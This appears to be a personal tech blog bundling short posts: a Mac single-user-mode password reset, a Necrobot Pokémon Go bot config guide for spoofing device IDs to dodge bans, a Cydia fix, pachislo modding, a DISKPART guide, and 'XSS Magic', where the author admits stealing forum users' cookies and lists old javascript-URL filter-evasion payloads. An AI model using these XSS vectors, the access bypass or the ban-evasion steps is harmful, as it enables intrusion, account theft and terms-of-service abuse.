How to change a forgotten password on a MAC

My memory isn’t as glorious as it once was, so this is more of a mental note for my future self. That is if I can remember that I wrote it here…

This will NOT tell you the current password or allow access to the keychain (without decryption). This creates a NEW password.

Let’s begin..

Power on the MAC and immediately press and hold both the CMD and the S Key. This will boot us into a terminal window.

Now type the following commands listed in BOLD:

mount -uw /

cd users

ls

passwd accountname

Now type in your new password, and then again to confirm.

reboot

Now login to the account you changed the password for with the new password.
You’ll get a warning about the keychain, if you need to recover any data from the keychain you should ignore it and DO NOT create a new one. You can decrypt the keychain if needed using keychain dumper and view it using DB Browser for SQlite.

Done! – Easy huh?

 

Guide to “auth.json” for Necrobot 0.7.x

This is just a quick guide on how to change the default device info listed in the “auth.json” file in Necrobot 0.7.x.

First let’s take a look at the default file to get a clear comparison.
Below we can see the default contents of this file..

{
“AuthType”: “ptc”,
“GoogleUsername”: null,
“GooglePassword”: null,
“PtcUsername”: “Username”,
“PtcPassword”: “Password”,
“UseProxy”: false,
“UseProxyHost”: null,
“UseProxyPort”: null,
“UseProxyAuthentication”: false,
“UseProxyUsername”: null,
“UseProxyPassword”: null,
“DeviceId”: “8525f5d8201f78b5”,
“AndroidBoardName”: “msm8994”,
“AndroidBootloader”: “unknown”,
“DeviceBrand”: “OnePlus”,
“DeviceModel”: “OnePlus2”,
“DeviceModelIdentifier”: “ONE A2003_24_160604”,
“DeviceModelBoot”: “qcom”,
“HardwareManufacturer”: “OnePlus”,
“HardwareModel”: “ONE A2003”,
“FirmwareBrand”: “OnePlus2”,
“FirmwareTags”: “dev-keys”,
“FirmwareType”: “user”,
“FirmwareFingerprint”: “OnePlus/OnePlus2/OnePlus2:6.0.1/MMB29M/1447840820:user/release-keys”
}

I’m going to break some of this down line by line.

“AuthType”: “ptc”,

AuthType
This is asking which method of Authorization you want to use, in other words, how you want to login. It can be set to either “ptc” or “google” depending on how you setup your account. PTC stands for Pokemon Trainer Account. You can create a PTC account if you don’t already have one here

.”GoogleUsername”: null,
“GooglePassword”: null,

Here the form is asking for your Pokemon Go accounts Google Login information.
Both the Username and Password should be wrapped in “Quotes” as shown directly below.

.”GoogleUsername”: “Username”,
“GooglePassword”: “Password”,

Tip: Do NOT enter your PTC & Google Account, only enter the login credentials for one of these.

The same rules apply to entering the PTC login info as in the above example for Google.

“PtcUsername”: “Username”,
“PtcPassword”: “Password”,

Proxies
These are all related to Proxy Settings. If you don’t know what these are you can leave them as is. They’re helpful for people running several bots at once from the same IP address in avoiding a ban. You can google or search YouTube for more information about Proxies.

“UseProxy”: false,
“UseProxyHost”: null,
“UseProxyPort”: null,
“UseProxyAuthentication”: false,
“UseProxyUsername”: null,
“UseProxyPassword”: null,

Now for the part I’m sure most you were waiting for…

Device Info
Let’s start with the Device ID, because I’m going to break this down into two simple steps.

“DeviceId”: “8525f5d8201f78b5”,

Above we can see the default “DeviceId”, this is probably going to get you banned 100% if you use it, and the fact that changing it wasn’t an option in the initial setup has me very worried for many users. And is why I’m working on automating this process. But for now let’s change this using either of the steps below.

I don’t have an Android Device
If you don’t have an android device don’t worry, just fake the info using the guide below.
You will of course sill need a Device ID, so let’s grab that before you continue.

[Missing information to be updated soon! – Sorry]

I have an Android and would like to get the devices “Android ID”
Getting the Android ID is simple!
In the Google Play Store search for and download “Device ID” by “Redphx”, it’s FREE!
Once you have it installed simply launch the app, and your “Device ID” will be listed right at the top in plain sight.

Now that you have a Device ID let’s move on..
Again below we have the default settings, and again we should really change these to something more unique to help avoid increasing our chances of a ban.

“AndroidBoardName”: “msm8994”,
“AndroidBootloader”: “unknown”,
“DeviceBrand”: “OnePlus”,
“DeviceModel”: “OnePlus2”,
“DeviceModelIdentifier”: “ONE A2003_24_160604”,
“DeviceModelBoot”: “qcom”,
“HardwareManufacturer”: “OnePlus”,
“HardwareModel”: “ONE A2003”,
“FirmwareBrand”: “OnePlus2”,
“FirmwareTags”: “dev-keys”,
“FirmwareType”: “user”,
“FirmwareFingerprint”: “OnePlus/OnePlus2/OnePlus2:6.0.1/MMB29M/1447840820:user/release-keys”

Using the site https://www.androiddevice.info/devices we can get all the data we need for editing our auth.json file. Simply visit the site and search for your device. Keep the search as simple as possible or your device may not show up. Instead of searching for “Samsung Edge 7” try searching for “G935” which the part of the model number. You can find your devices model number (Device Codename) in the app “Device ID” I listed and linked to above, or under the battery or in Settings > About Phone > Model Number.

Tip: If you can’t find your device listed just use the info from a similar device.

Now let’s finish this thing and get botting!
As you can see below I’ve filled in on each line the name of the field you should look for to find this information. Some devices have the bootloader listed, most I came across don’t. You can leave this set to unknown or search for it using your Google Skills.

“AndroidBoardName”:”ro.product.board”‘
“AndroidBootloader”: “unknown”,
“DeviceBrand”: “ro_product_brand”,
“DeviceModel”: “ro.product.device”,
“DeviceModelIdentifier”: “ro_build_display_id”,
“DeviceModelBoot”: “ro_boot_hardware”,
“HardwareManufacturer”: “ro.product.manufacturer”,
“HardwareModel”: “ro.product.model”,
“FirmwareBrand”: “ro.product.name”,
“FirmwareTags”: “ro_build_tags”,
“FirmwareType”: “ro_build_type”,
“FirmwareFingerprint”: “ro_build_fingerprint”

Happy Botting!
– DNA64
twitter.com/DNA64

Pokémon Go

So for the last few weeks I’ve been rather busy and getting more exercise than usual and it’s all thanks to Pokémon Go!

Not only am I a fan of this game for obvious reasons; like the exercise and social interactions that come with it, but I also have a deep interest in the game because of the large community around the game helping document the API functions.

I’m working on a few projects based on this game, and plan on making contributions to other projects as well. I’ve already donated some beer money to at least one project, and hope to soon be able to contribute some code and bug fixes to a few others.

And now a short Rant…

Of course if Niantic had anyone working for them that knew jack shit about what the community wants then most of these 3rd party applications wouldn’t even be needed.

They talk about fairness and getting out in the real world, and I can’t help but wonder if any of them even play this god dam game. In one city there’s 130+ Pokémon in a single park. Meanwhile entire cities elsewhere have 3 f***ing Pokémon. And they wonder why people want maps and the 3-step bug fixed. Players have PokéStops and Gyms accessible from the comfort of their homes, while others don’t even have any! So I don’t blame people for GPS Spoofing. The game is extremely unbalanced and unfair period.

Type ‘reboot’ is not known on line 1 in source list /ect/apt/sources.list.d/saurik.list

Cydia is terrible at updating itself and it’s dependencies when you let it get outdated or use older jailbreak packages without first updating the cydia.pkg within. So if you happen to be say Jailbreaking you iPod Touch 4th Generation on iOS 6.1.6 and you get this error (Type ‘reboot’ is not known on line 1 in source list /ect/apt/sources.list.d/saurik.list) while upgrading the essentials, fear not! It’s a Simple Fix!

Just connect your device to your computer and use iFunBox then select “Raw File System” to browse to “/ect/apt/sources.list.d/saurik.list”, locate the “saurik.list” file and open the file in any text editor.

Now DELETE the line that says “reboot”, save the file. Launch Cydia and select “Sources” from the bottom menu. Then tap “Refresh” in the top left.

Problem Solved!

Pachislo Skill Slot Modding

Something I’ve been meaning to post about is my latest hobby, Pachislo skill slot machines.

They’re very similar to slot machines you would find in a Casino and the machines vary by theme and design much like Casino slots do, however these Japanese units operate a little differently. Pachislo machines require you to use your skills to stop each wheel using 1 of 3 buttons on the machine. The wheels will stop after about 60 seconds on there own.

After acquiring my first machine I immediately opened it up and began examining the components. It was a very familiar sight having had a great deal of experience not only with Arcade Machines and Computers, but with Electronics in general.

I quickly started thinking of ways I could modify the machine to improve it. Here’s a list of some of the ideas I had for modifications.

  • Volume Control
  • Accept a broader range of Tokens/Coins
  • Free Play/Credit Button
  • Auto Spin on Max Bet
  • Auto Stop each of the wheels at random
  • Adding a One Arm Bandit on the side
  • Moving the transformer away from the coin overflow exit

Now as it turns out, I’m not the first to think of these things, I think most all of these are fairly simple elements, that anyone playing the machine would realize were missing or desired.

I also thought of incorporating one of my Raspberry Pi’s or Pine64+ or even a C.H.I.P to handle some stats and the spinning of the reels. And outputting some of this data to the Pachislo’s own LCD display on demand.

I’m in the process of acquiring 5 more machines.

More Pachislo related posts and photos to follow soon!

.

HOW TO: Format a troublesome USB stick in Windows with DISKPART

If there’s anything I love about windows, it’s the command line!

If you find yourself dealing with a USB stick that just wont mount, has multiple partitions, or among other things won’t format this might just save your sanity.

HOW TO: Format a troublesome USB stick in Windows with DISKPART

(FOLLOW THIS GUIDE AT YOUR OWN RISK! I’M NOT RESPONSIBLE FOR ANY OF YOUR ACTIONS OR THE ACTIONS OF OTHERS FOLLOWING THIS GUIDE)

Step 1) Open a CMD window.

Click on the Windows “START” button, and in the search box type “cmd“. You should see “cmd.exe” appear at the top of the list under programs. Right Click it and select “Run as administrator”.  Click “Yes” if/when promoted. You should now see a terminal window pop up on your desktop.

Step 2) Using DISKPART

What is it? diskpart is a command-line disk partitioning utility and is the successor to fdisk.

Type “DISKPART” (Not case sensitive) and press “ENTER” on your keyboard. With DISKPART now running type “list disk“. Locate the USB drive you want to format. I’m using an 8GB USB by Kingston for this example and it shows up as “Disk 3” “7500 MB” (Remember 1,024MB = 1GB, and formatting requires some use of the available space).

Now type “select disk x” (x being the number that is your USB stick, mine is 3 yours may be different). It will then tell you “Disk x is now the selected disk.” at which point you can type “clean“. You should see a message stating that “DiskPart succeeded in cleaning the disk.” At this point windows doesn’t know the capacity of the drive because we haven’t created a partition, so we need to fix that. Type in “create partition primary” and press “ENTER”. At this point you can now close the command window and format the USB stick as you normally would in Windows by right clicking on the drives icon and selecting “FORMAT” from the drop down menu.

Questions? Comments? Your feedback is welcome! Let me know if I helped, it motivates me to post more guides like this =)

 

 

XSS Magic

So I used to be a part of this community forum before Facebook was around and everyone had their own profile pages, the problem was they were boring. The code you were allowed to use was heavily restricted so no Flash or Javascript was allowed, not even mouseover images!.

There was also banner ads at the top of the pages and you had to pay to have them removed. They interfered with the look of your page when you customized them with CSS.

Well, I wasn’t having any of this. I planned on bypassing every restriction imposed, and I did just that using XSS. I also used XSS to steal cookies of users on the forums and get around other restrictions. Here’s some old code I found that I used on the site successfully.

<!–BANNER KILLER–>
<STYLE type=text/css>
IFRAME {
VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px
}
</STYLE>
<!–BANNER KILLER–>

 

<!–<hr style=`background:url(javascript:alert(‘who’);alert(‘said’);alert(‘they’);alert(‘disabled’);alert(‘Javascript :P’))`>–>

 

<div align=”center”><img src=”Javascript:void(window.defaultStatus = ‘Thanks for Visiting’)” width=”1″ height=”1″ align=”middle”>

 

<IMG SRC=”javascript:alert(‘Wellcome to the site!)” width=”1″ height=”1″ align=”middle”>

 

CSS
Code:

.MouseOvr {
width:75px;
height:32px;
background: url(“”);
display:block;
}
.MouseOvr :link,
.MouseOvr :visited {
width:75px;
height:32px;
background: url(“”);
display:block;
}
.MouseOvr a:hover {
width:75px;
height:32px;
background: url(“http://www.google.ca/intl/en_ca/images/logo.gif&#8221;);
display:block;
}
.MouseOvr a:hover span {
visibility: hidden;
}

HTML: Add this anywhere in your page you want the link
Code:

<h1 class=”MouseOvr”>
<a href=”http://google.ca”&gt;
<span>Link</span>
</a>
</h1>